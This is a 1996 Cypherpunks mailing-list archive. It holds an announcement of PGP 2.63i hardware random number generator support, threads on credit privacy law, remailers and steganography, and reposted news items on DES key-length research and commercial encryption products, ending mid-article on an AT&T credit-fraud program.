Message-ID: <v01530507ad3dd0d52ee6@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:06 PM 2/6/96, Lucky Green wrote:
>Just watched an "expert" on Bay TV (SF Cable). He stressed that websites
>without firewalls pose the risk of spreading viruses when downloading files
>from them. A  GIF was being downloaded in the background...
>
>LOL.
>
>I only wonder who the fuck is hiring such idiots.

Certainly not my former employer.  This guy seems to know far too much
about net security to work there.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://www.wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rngaugp@alpha.c2.org
Date: Wed, 7 Feb 1996 16:02:43 +0800
To: cypherpunks@toad.com
Subject: Hardware RNG support for PGP 2.63
Message-ID: <199602070406.XAA00825@miron.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


There is now support for using a hardware random number generator
with the most recent version of PGP, (pgp263i)

Version pgp 2.63i is now supported.

The files for this modification of pgp
are at the export controled ftp site in the directory:

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_????????/pgp/rng

the files are:	
		rg263.zip	(compiled both ways, so there
				are executables approapriate for
				both inside and outside USA.)


Sources for the modifications are included. Executables are
included for OS/2 and MSDOS.

In the above ????????? varies because of the export control
scheme. To get the files if you are in the U.S. and Canada
first get the file ftp://ftp.csn.net/mpj/README.MPJ and
follow the instructions.

Many thanks to mpj@netcom.com for providing storage at the
export controled ftp site. Other ftp sites are welcome to
store these files. Be aware of ITAR.

By the way I used to use the mail address:
mg5n+alias!rngaugp@andrew.cmd.edu
But I now use:
rngaugp@alpha.c2.org
because it is faster. But you can tell it is the same
person because I sign with the same PGP key.

Here is the README file that comes with the modifications.
- ------------------------------------------
	       Hardware Random Number Support for PGP.
	           PGP 263 international version

Ever get tired of typing in keyboard timing strokes while generating a
PGP key? Ever want to use PGP unattended, but be foiled because there is
no one there to type the keyboard timing strokes?

Ever wonder if PGP's method of generating random number might have some
subtle flaw which would expose it to cryptanalysis?


This is a modified version of PGP which allows it to be used with a
hardware random number generator. Two kinds of RNG are supported: 
First, any RNG with a IO driver that makes the RNG look like a file that
can be opened (fopen) such that each byte read is a random byte. Second,
a bus RNG under the x86 architecture such that random bytes my be
obtained with a simple "IN" instruction. The CALNET/NEWBRIDGE RNG is an
example of this kind of RNG. A crude sanity check is done to check that
the bytes appear to be random.

To use the hardware random number generator feature of this software,
you must define _ONE_ of the new configuration file parameters RNGDRIVER
or RNGPORT in config.txt or from the command line.  If you have a RNG of
the first type, define RNGDRIVER to be the complete path to the RNG
driver. If you have a RNG of the second type, define RNGPORT to be the
port number from which to get random numbers. You can use hexadecimal
i.e. 0x300.

Examples:

RNGDRIVER=/dev/random

or

RNGPORT=0x300


If neither of these are defined the modified PGP will get its RANDOM
numbers in exactly the same way that regular PGP does, through keyboard
timing. If one of these parameters is set correctly, the modified PGP
will get its random numbers from the RNG and you will never be asked to
type keyboard timing stokes.



I have compiled a version of PGP that supports a hardware RNG for MSDOS
and OS/2. I have included the source files for each file that has been
modified. To compile get the original source files, put in the modified
files and compile as usual. 

The new source files and this software are covered by the same license
as the original, the MIT licence.

The USA version pgp263 (without the i) is covered by the RSA license.


If someone out there has an PSI-LINE random number generator that
attaches to a RS-232 port as if it were a modem,  please test it with
this software. If the software line characteristics (baud rate, flow
control, stopbits, ect) are set correctly (You will have to do this
yourself, as this modified PGP does not do this) then all you should
have to do is set RNGDRIVER to the RS232 device name. I have not tested
this because I do not have this kind of RNG.

Someone may wish to add code to set the software line characteristics,
but this may be difficult, as the code would vary by operating system
and even among the various flavors of UNIX.

If you do such a test please report the results to alt.security.pgp and
cypherpunks.



The executables in the subdirectory "USA" are linked with the 
RSA library and will not allow you to disable the legal kludge.
They should be OK to use in the USA.

The executables in the "I" subdirectory are not linked to the RSA
library and allow you to disable the legal kludge. It should be
OK to use in countries outside the USA such as CANADA.


The executables in the subdirectories "DOS" can be used with
MSDOS. The executables in the subdirectories "EMX" can be used
with OS/2 if you have the EMX runtime system installed. The
executables in the subdirectories "OS2" can be used with OS/2.

The zip file should be unziped with the "-d" switch if using pkunzip.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: cp850

iQCVAgUBMRZneM29s2mG+tTVAQEeVgP/dHnlQd73Yyyzw4uB1lwo76aDZOiVe+i4
VV5aUBpTtBYTknPNeKFaUhLOxZo2tykSrByPXuAQ0dzKyL5MxIOAt52sBx2nQoOi
EOFq6mlQH+yUfcfRcjnFGoWtyasBfpdEzO07/shiB8Ts1rRxSR2z0rCoXNuRM8a6
5oU8NDc1vVw=
=H9r8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Feb 1996 12:40:55 +0800
To: bplib@wat.hookup.net
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <01I0WSDNB97KA0UVEU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bplib@wat.hookup.net"  "Tim Philp"  6-FEB-1996 23:08:03.68

>	I think that you may have misunderstood just what my position is.
There are circumstances that people are faced with in our modern society
that compel them to release data about themselves. Here I am speaking
about the information required if you want to use credit cards, have a
telephone, use health insurance, pay income tax ( could do without this
one! <G>), or register to vote. I do not believe that it is unreasonable
that the organizations that collect this data should be compelled to keep
this information confidential.  
-----------------
	With the exceptions of "use credit cards" and
"use health insurance," all of these are ultimately governmentally dictated
(by the governmental monopoly status if nothing else). I agree that the
government (and its sponsored monopolies) should not be able to keep
information that it does not need, and that it should be required to keep
such information confidential. One can do without credit cards; I use mine
about once a month, and that only because I can be lazy at times (not wanting
to go to the bank to get more cash). A group health insurance plan can also
enable doing without providing medical information; I am currently covered by
such a plan.
------------------

>	In an earlier message to this thread, it was suggested that I
should not call down the forces of the state ("lets pass a law") to deal 
with this issue. I wish that it could be dealt with in another way. If 
personal information is not controlled, it will work towards the 
detriment of the individual. My personal opinion is that the state exists 
to serve the individual, not to control him. In our current society an 
individual has little control over the release of personal data, 
therefore the state should legitimatly protect the individual. If you 
wish to control your own information, you must be prepared to be a real 
hard case.
-----------------
	I certainly agree that the purpose of the state is to protect the
rights of the individual. It's just that you're wanting more interference in
the rights of other individuals (like the stockholders of the CC companies)
than is justifiable. For maximal control over one's life, sometimes one does
have to be a "real hard case." That's life.
	-Allen

P.S. As TCMay pointed out earlier in this thread, all this is a moot point.
In the expiry of credit information, for instance, all one has to do is make
use of a credit evaluation agency (that stores information) in another country.
If its methods are proprietary, it's a bit difficult for the state to prove
that you're using an organization that violates its rules. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Wed, 7 Feb 1996 12:30:11 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Fair Credit Reporting Act and Privacy Act
In-Reply-To: <01I0WOIQESFIA0UV0C@mbcl.rutgers.edu>
Message-ID: <Pine.OSF.3.91.960206225721.6807B-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Feb 1996, E. ALLEN SMITH wrote:

> 	So you're prepared for everyone to pay more, but not for those who
> want privacy to pay more? While I do support taxes to pay for a minimal amount
> of welfare, I don't think that much intrusion into private property rights is
> justified.
> 	-Allen
> 
	I think that you may have misunderstood just what my position is.
There are circumstances that people are faced with in our modern society
that compel them to release data about themselves. Here I am speaking
about the information required if you want to use credit cards, have a
telephone, use health insurance, pay income tax ( could do without this
one! <G>), or register to vote. I do not believe that it is unreasonable
that the organizations that collect this data should be compelled to keep
this information confidential.  
	When I spoke about the price to pay, I was speaking somewhat
metaphorically in that it is possible to keep this information to your
self and not have to PAY anything. The actual PRICE that is paid is that
you are not able to participate fully in our society. I don't believe that
you can equate this type of price that you pay in social currency with an
actual price that you pay because merchants must assume more risk. 
	In an earlier message to this thread, it was suggested that I
should not call down the forces of the state ("lets pass a law") to deal 
with this issue. I wish that it could be dealt with in another way. If 
personal information is not controlled, it will work towards the 
detriment of the individual. My personal opinion is that the state exists 
to serve the individual, not to control him. In our current society an 
individual has little control over the release of personal data, 
therefore the state should legitimatly protect the individual. If you 
wish to control your own information, you must be prepared to be a real 
hard case.
Regards,
Tim Philp





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 7 Feb 1996 14:53:48 +0800
To: Deranged Mutant <wlkngowl@unix.asb.com>
Subject: Re: Defeating untrustworthy remailers?
In-Reply-To: <199602070521.AAA17716@bb.hks.net>
Message-ID: <Pine.LNX.3.91.960206231217.8103M-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 7 Feb 1996, Deranged Mutant wrote:
 
> On Wed, 7 Feb 1996, Deranged Mutant wrote:
> 
> Date: Wed, 7 Feb 1996 00:21:58 -0500
> From: Deranged Mutant <wlkngowl@unix.asb.com>
> To: cypherpunks@toad.com
> Subject: Defeating untrustworthy remailers?
> 
> Here's another idea (don't laugh): to set up a system where mailing
> lists and newsgroups have public keys that you can encrypt directly to.
> Advantage for anonymous mail is that if a remailer is untrustowrthy,
> there's still some security in the final remailing of the document.
> 
> Furthermore, non-encrypted mail is less at risk of tampering. And some
> newsgroups or lists could requires a signed message from an approved
> key before posting.
> 
> there is no reason to laugh at this.  there is already a mailing list 
> where all traffic is encrypted using either the remailer's public key or 
> the going the other way, the users public key.  it's John Perry's 
> cypher-list.
> 
> -pjf
> 
> 
> "Those that give up essential liberty to obtain a little temporary
>  safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
> 			  finger for PGP key
> zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 
> 




"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMRhDXk3Qo/lG0AH5AQHGRAP+PlD1lbYr0nJRyrKO7Q7i8MCdA+msLpZL
Sh9H2zXLI8trLFFxDKPw+XNjCa8X999PgceuLaDS2TdxmesUqsoxusZOh+ce3PuM
vjiOpY/bFpsrS4ObF5IswjVZQNnYPZL5AD8VAu1hwwRBg9WiMVM9oqiQF5JF49pl
ZpNcfaETn2g=
=abHX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Wed, 7 Feb 1996 13:08:11 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Electronic Grille Cipher?
Message-ID: <199602070458.XAA06194@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


> >An idea occurred to me the other day, for hiding multiple
>> texts in one file using multiple keys.  The gist of it is to
[..]
> 	I had a similar idea a bit back, and Lewis/Futplex kindly referred me
> to some parts of the Archives discussing it. However, the main objection to

What part of the archives?

> this idea was that the cops would just do a search warrant for the second group
> of information. My solution to this is to have quite a few groups of
> information, which would admittedly make the spacing problem a bit hard.
> The following might be an example for someone of such a scheme:

That's a good solution.  Another idea might be to stego the 
accounting info (real info ;) inside one of pictures using a similar 
method.... in some ways this method is better suited for stego since 
it becomes lunacy for the cops to insist that every picture or 
audiofile  you have has something or many things hidden... (unless 
they've been watching you and know you keep accessing your jodi 
foster pix after a client visits you...)

Rob.
 
--- "Mutant" Rob <wlkngowl@unix.asb.com>

Send a blank message with the subject "send pgp-key"
(not in quotes) for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 7 Feb 1996 16:30:23 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: paper on remailers in the intelligence community
Message-ID: <199602070806.AAA00707@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:37 AM 2/7/96 -0800, Tim May wrote:

>Strassman is a regular columnist for "Computerworld" and a member of
>various advisory councils (including a conspiracy-feeding thing called the
>"EC World Council"). He was a bigshot in the DOD, works for the
>"Information Warfare" folks (the much-hyped new area generating so many
>conferences), and has all sorts of ties to the mil-info complex. An Alta
>Vista search on the string "Paul A. Strassmann" is revealing.

Ah. A feeble attempt to deflect attention from your own cooperation with the
Grey aliens and their boot-licking military-industrial-complex errand boys.
Even more revealing is an Alta Vista search for

"timothy c. may" and "william marlow"

Now you'll probably claim that you've never met Marlow or Strassman. Sure.
We know what you're up to. You're not fooling us, Medusa. :)

--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 7 Feb 1996 15:33:05 +0800
To: cypherpunks@toad.com
Subject: Re: paper on remailers in the intelligence community
Message-ID: <ad3d8e9804021004edeb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:06 AM 2/7/96, t byfield wrote:

>        Surely you jest. It's one of the weirdest hodgpodges of inane free
>association I've ever read. The authors are a couple of regular Jack D.
>Rippers. Highlights:

It's about par for these "management" conferences. A deep, thoughtful
analysis is just not likely (and I don't mean this as a complete insult:
his paper is mostly just to touch on what these issues are, not to do an
academic study).

Strassman is a regular columnist for "Computerworld" and a member of
various advisory councils (including a conspiracy-feeding thing called the
"EC World Council"). He was a bigshot in the DOD, works for the
"Information Warfare" folks (the much-hyped new area generating so many
conferences), and has all sorts of ties to the mil-info complex. An Alta
Vista search on the string "Paul A. Strassmann" is revealing.


>>One of the most prominent anonymous re-mailers is <anon.penet.fi> is in
>>Finland. It is frequently used by the Russian (ex-KGB) criminal element.
>

Maybe he got this from all of the stuff that is sometimes attached
automatically to remailed messages: KGB, Sarin, Corona, Area 51, IRA, and
those cute slogans like "the shipment will be out of the Port of Oakland
at...," etc. :-}

But more seriously, any mil-info complex effort to demonize remailers must
of course invoke one of the Horsemen. At this time, "Russian Mafia
terrorists" is the putative focus of joint U.S.-Russian intelligence
activities, and was even the plot of the latest James Bond movie.

(Rumor has it that 007 will be doing battle with MEDUSA, the cyberspace
descendant of SMERSH, in this case meaning "death to tentacles.")

--Tim May





Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Wed, 7 Feb 1996 20:14:03 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Need a "warning" graphic of some kind for CDA
Message-ID: <199602070848.AAA05915@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 01:48 PM 2/4/96 EST, you wrote:
>"David K. Merriman" <merriman@arn.net> writes:
>> >Now that we all have web pages that are naughty and might be seen by
>> >little children, I'd like to hve some kind of a graphic that can
>> >universally be seen as a "Warning:  The following material is unsuitable
>> >for children and close-minded twits".  (or words to that effect).
>>
>> Hmmmmm. Maybe a doll with an international 'no' sign superimposed?
>
>Either the 'no' sign (red crossed circle) or a wide red cross over one of:
> rattle
> baby bottle / pacifier
> disposable diapers (with contents visible)
>  safety pin?

How about the circle-slash "no" symbol superimposed on the Constitution? 
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 7 Feb 1996 20:17:39 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: has this been on cypherpunks? (fwd)
In-Reply-To: <ad3dff7b0002100499e9@[137.110.24.250]>
Message-ID: <Pine.LNX.3.91.960207005215.8103P-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cpunks,

i particularily like this quote:

"Role Of Encryption

For added protection, users of Anonymous Re-mailers tend to encrypt their 
messages just in case one of the remailing links are compromised. PGP 
(Pretty Good Privacy) encryption is favored because it is freely available 
and easy to use. A typical digital signature would look like this: [...]"

hell,

i'd like to see these guys hang out on alt.security.pgp answering 
questions all day...

pjf, 'easy to use' my ass



"Those that give up essential liberty to obtain a little temporary
 safety deserve neither liberty nor safety." -- Benjamin Franklin (1773)
			  finger for PGP key
zifi runs LINUX 1.3.57 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMRha1E3Qo/lG0AH5AQESIwP9HUKUmvlVqOteom2xWLKW7az4V1lH4lex
e3MJMK1e5a6C2JRbs6JeoEj2o3hUIKwcF8DF0HmnAeETfXyM2qtY6PdkLQlWy+Qh
9w3BDi+m6cxy7TmADcLyBtg0bc6imdJGHyeTtcsT7XUyrKlf/O+o6QX9ip4FOqZz
5/OZ8j8KwK0=
=6K1U
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Todd Larason <jtl@molehill.org>
Date: Wed, 7 Feb 1996 15:27:24 +0800
To: William Knowles <printing@explicit.com>
Subject: Re: OCAF White Paper on porn on the net
In-Reply-To: <m0tjshX-000rNaC@maki.wwa.com>
Message-ID: <Pine.LNX.3.91.960207010322.2583B-100000@teeny.molehill.org>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 6 Feb 1996, William Knowles wrote:

> With the passing of the CDA recently, The first wounding of the rights
> of free speech online, The Oklahomans for Children and Families are going 
> in for the kill.  A WWW  site has been set up with a HTML version of what 
> the autoresponder sends out.
> 
> http://www.bway.net/~dfenton/noporn.html

The beginnings of a response (from a general mostly-lefist mostly-free 
speech perspective, not a cypherpunks perspective) can be found at 
http://www.galstar.com/alert.

Todd Larason
Oklahoma City, OK
-- somewhat nervous --




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Feb 1996 08:48:31 +0800
To: cypherpunks@toad.com
Subject: Strong Crypto Weak
Message-ID: <199602070013.BAA10222@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Strong Encryption Weak, Say Crypto Gurus


Washington, D.C., U.S.A., 6 February 1996 -- Strong
encryption is weak, reports a group of prominent
cryptographers and computer scientists. Their report,
released yesterday, is expected to play an important role
in coming debates over US policy on exports of software
that includes encryption capabilities. 

Current US policy generally limits exports to encryption
using 40-bit keys. On a case-by-case basis, the US has
allowed export of software with 56-bit digital encryption
standard (DES) encryption. 

Recently, two French graduate students cracked the 40-bit
encryption Netscape was using. The trick took several
days, using idle time on the school's computers. 

The seven experts who wrote the new paper -- "Minimal Key
Lengths for Symmetric Ciphers to Provide Adequate
Commercial Security" -- say the achievement by the
students at the Ecole Polytechnique was trivial. 

"Anyone with a modicum of computer expertise and a few
hundred dollars would be able to attack 40-bit encryption
much faster," they write. They add that using a field
programmable gate array (FPGA) chip, costing about $400
mounted on a card, "would on average recover a 40-bit key
in five hours."

"A more determined commercial predator," says the paper, 
"prepared to spend $10,000 for a set-up" using 25 FPGA
chips, "can find 40-bit keys in an average of 12
minutes."

Moving to a 56-bit DES system doesn't solve the problem,
says the paper. "Calculations show that DES is inadequate
against a corporate or government attacker committing
serious resources. The bottom line is that DES is cheaper
and easier to break than many believe." 

And it is getting easier to crack DES code, says the
paper. "At present, it would take a year and a half for
someone using $10,000 worth of FPGA technology to search
out a DES key. In ten years time, an investment of this
size would allow one to find a DES key in less than a
week."

A serious attack against DES, on the order of $300,000,
"could find a DES key in an average of 19 days using
off-the-shelf technology and in only three hours using a
custom developed chip," say the cryptoanalysts. That's
the sort of money a business, or a criminal organization,
might be willing to spend to find trade secrets or dip
into a flow of financial transactions. 

A government intelligence agency willing to spend $300
million "could recover DES keys in 12 seconds each," says
the paper. "The investment required is large, but not
unheard of in the intelligence community. It is less than
the cost of the Glomar Explorer, built to salvage a
single Russian submarine, and far less than the cost of
many spy satellites."

What's the proper key length for protection against
criminal operations or a prying government? The analysts
"strongly recommend a minimum key-length of 90 bits for
symmetric cryptosystems." That's far stronger than
anything the US government has ever contemplated allowing
for export.

The paper was written by some of the most prestigious  
individuals in the field: Matt Blaze, Whitfield Diffie,
Ronald Rivest, Bruce Schneier, Tsutomu Shimomura, Eric
Thompson, and Michael Wiener. 

Blaze, at AT&T Research, recently demonstrated weaknesses
in the government's "Clipper Chip" key escrow system.
Diffie, at Sun Microsystems, was a co-creator of public
key cryptography. Rivest, at MIT, was one of the
inventors of the RSA public-key system and one of the
founders of RSA Data Security Inc.

Schneier, president of Counterpane Systems, is the author
of a leading textbook, Applied Cryptography. Shimomura,
at the San Diego Supercomputer Center, last year tracked
down outlaw hacker Kevin Mitnick. 

Thompson heads AccessData's crypto team, which has
regular clients that include the FBI and other law
enforcement agencies. Wiener, at Bell-Northern Research,
wrote an influential 1993 article, "Efficient DES Key
Search," which describes how to build a machine to attack
DES by brute computational force.

The paper grew out of a one-day meeting in Chicago last 
November, which was supported by the Business Software
Alliance. The paper is available on the BSA World Wide
Web site, http://www.bsa.org/. 

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Feb 1996 09:14:14 +0800
To: cypherpunks@toad.com
Subject: Fax Fools US Espionage
Message-ID: <199602070054.BAA11802@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



"Foolproof" Encrypted Fax System

                         
Derby, England, 6 February 1996 -- Wordcraft, the
Derby-based software house, has announced that its
proposals for a "foolproof" secure fax transmission
system will be considered by the International
Telecommunications Union's meeting in Geneva,
Switzerland, next week. 

According to Mike Lake, the company's managing director,
Wordcraft has been working closely with a number of other
companies, notably Chantilly (another UK firm) on the
proposals, which will be considered alongside a competing
set from French and German companies.

Lake told Newsbytes that the Wordcraft system is known as
Automatic Fax Services (AFS) and consists of four
elements: authentication, message confirmation,
integrated encryption, and a certificate of receipt. 

The authentication element of AFS revolves the generation
of the fax device's serial number and unique transaction
number for each fax transmission. Message confirmation is
generated by the distant fax device, while the
certificate of receipt is printed after confirmation 
is received.

"Existing fax transmission reports are just that -- a
note of transmission. AGS creates a new document, a
certificate of receipt, which proves that a fax was
transmitted," Lake said.

The encryption system, meanwhile, uses a proprietary, but
open systems standard of encryption, using a one-time
passkey, which is transmitted by the sending fax device
in a secure manner.

"This contrasts with the French/German system which is
based on RSA's private and public key system. That system
is flawed, since it relies on the US Government licensing
a manufacturer to use the algorithm, something that the
Government is unlikely to do with, for example, a
Japanese fax manufacturer," Lake explained.

According to Lake, even if the ITU Study Group 8 approves
the French/German secure fax system next week, no major
fax vendor is likely to implement such a system on their
fax machines if the US Government is allowed to licence
each fax machine for use.

"The AFS system is secure, yet does not need the
permission of anybody to use it. In that sense, it's a
more global system," he said.

So what does Wordcraft get out of the proposed standard?
According to Lake, the company is offering a series of C
language routines for inclusion in the firmware of fax
machines, and fax software drivers. These routines, he
said, allow driver programs to be coded very easily. It
is the modest licence fees for this software with which 
Wordcraft is hoping to recoup its investment.

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Feb 1996 18:51:33 +0800
To: cypherpunks@toad.com
Subject: GTE's Virtual CA
Message-ID: <199602070103.CAA12764@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



GTE's CyberTrust For Web Electronic Commerce


Washington, D.C., 6 February 1996 -- GTE officials say
that the company's new CyberTrust electronic commerce
program will allow companies for the first time to handle
most of the CA (Certification Authority) function by
themselves, by means of secure Web servers. 

At the Comnet press conference, reporters were told that
GTE, a partner of both Mastercard and Visa, will
introduce its new "Virtual CA" capability for Webmasters
in conjunction with a trio of related services.

The four new services from GTE are aimed at financial  
institutions, online merchants, and government agencies,
as well as at the corporate and consumer markets, said
Charles S. Walton, Jr., CyberTrust's program director,
speaking at the Comnet press event. 

One component of CyberTrust, called the Electronic
Commerce Service, will provide an "infrastructure" for
credit card companies using new secure payment standards
for online transactions, Walton added. 

Another new service, the Partner Forum, will provide
online test services and tech support for developers and
integrators in the electronic commerce arena. 

Through GTE's new Cybersign service, GTE will directly
handle the maintenance of public key certificates, as
well as the issuance, renewal, and revocation of these
certificates.

But with Virtual CA, GTE will manage certificate
management only, permitting Webmasters at subscribing
companies to do their own issuance, renewal, and
revocation of certificates.

Walton acknowledged that GTE's new suite of services will
be targeted at the same market now dominated by Verisign.
But the GTE services, he maintained, will be
differentiated on the basis of general "operational
environment," as well as by Virtual CA. 

In a follow-up interview later, Walton said that GTE, a
long-time consultant to Mastercard, began working with
both Mastercard and Visa last November on development of
SET (Secure Electronic Transactions), a new joint
standard for online credit card transactions. 

GTE, he added, hosted both Mastercard and Visa last week
at GTE headquarters in Needham, Massachusetts. Aside from
GTE, Mastercard and Visa, other partners in the SET
effort include Verisign, IBM, Microsoft, Netscape, SAIC,
and Terisa Systems.

GTE had previously helped Mastercard to create the SEPP
standard, according to Walton. GTE's new CyberTrust,
first announced as supporting SEPP, will now support its
"successor," SET, he noted. CyberTrust will also comply
with the SSL protocol for Web security.

During the press event at Comnet, Walton reported that
Cybersign and Virtual CA will implement a "dual card,
split RSA key design," with "strong access controls." The
two systems will use PCMCIA cryptographic hardware token
technology and X.509-certificate-compatible software.

Virtual CA, he continued, will initially be available on
Sun Solaris-based secure Web servers, but will be ported
to Windows NT-based secure Web servers by the end of
1996. End users will be able to access Virtual CA through
Netscape browsers.

The Web server-based service will introduce "verification
at the server level, which is really where you want it to
be," asserted the GTE official. 

On-site Webmasters are in a particularly good position to
confirm that users "are who they say they are," the
journalists were told. 

As a result, Virtual CA will use a technique called "pre-
verification," in which the Webmaster, or RA
(Registration Authority), will validate and approve
users' certificate requests before the requests go to
CyberTrust. CyberTrust will then return a certificate for
the end user, in the form of an algorithm, either direct
to the end user or through the RA.

Companies subscribing to Virtual CA will receive custom
home pages for certificate data entry, and for issuing,
renewing, and revoking certificates, Walton said. 

The CyberTrust program director said that the  
special PCMCIA hardware will be used at the "CA level"
only, and will not be required by either end users or
Webmasters.

No "actual cards" will be issued to, or needed by either
group, he added. GTE plans to begin offering both Virtual
CA and Cybersign in the second quarter.

--






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Feb 1996 18:45:54 +0800
To: cypherpunks@toad.com
Subject: GE's Transaction Tech
Message-ID: <199602070106.CAA13461@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



GE Info Services Launches New Transaction Technology 


Rockville, Md., 6 February 1996 -- General Electric's  
GE Information Services division said it is launching a
new set of hardware and software products that will
protect business transactions over the Internet. One of
the features of the new system, called "GE
InterBusiness," involves using one-time use encryption
codes for each online session. 

The new offering combines the one-time, or dynamic,
encrypted session key, mutual authentication, and
advanced firewall technology, officials said. By using
standard Internet protocols, a user can conduct
electronic data interchange, electronic messaging, and
electronic file transfers via a secure "pipeline." Those
three elements are key in both electronic commerce and GE
Information Services' Business Productivity solutions.

Anne Biehl, manager of market development for GE
Information Services, said one of the key differentiators
between her company's secure business transaction
technology and offerings from other companies lies with
the dynamic encrypted session key. "This is the first
system on the market today, that we know of, that's using
(this technology)," she said. "It's a pretty powerful
'ring of security' for our users. It's a nice feature
we've integrated into our total solution." With the
dynamic session key, the session is encrypted to secure
all information passed from sender to receiver. The key
itself is never seen on the Internet, and hackers can't
break the encryption, officials stressed.

The new system uses the standard networking and
connectivity of the Internet to interface with systems
used by GE's 40,000-plus customer companies, officials
said. GE InterBusiness runs on all browsers, resides on
any Internet-compatible desktop, and interacts with
standard Internet applications.

GE InterBusiness is available now, Biehl said. Pricing
varies depending on the client's requirements, she said.

Biehl said today's announcement has nothing to do with
the completed sale of the group's GEnie online service to
Queens, New York-based Yovelle Renaissance Corporation,
reported last month.

For additional information, those with Internet World
Wide Web access can surf to GE Information Services' Web
site at http://www.geis.com/.

--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 7 Feb 1996 18:50:57 +0800
To: cypherpunks@toad.com
Subject: ATT Waives Fraud Fee
Message-ID: <199602070109.CAA14579@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



AT&T WorldNet Spurs Online Credit Use


Bridgewater, NJ, 6 February 1996 -- In a teleconference
today, officials of AT&T's WorldNet and Universal Card
services announced a program aimed at allowing users to
"feel safe" in making online transactions by waiving the
standard $50 deductible fee on the use of credit cards
for "fraudulent" purposes.

The new program, to begin within eight weeks, will apply
to all dial-up customers of both WorldNet and Universal
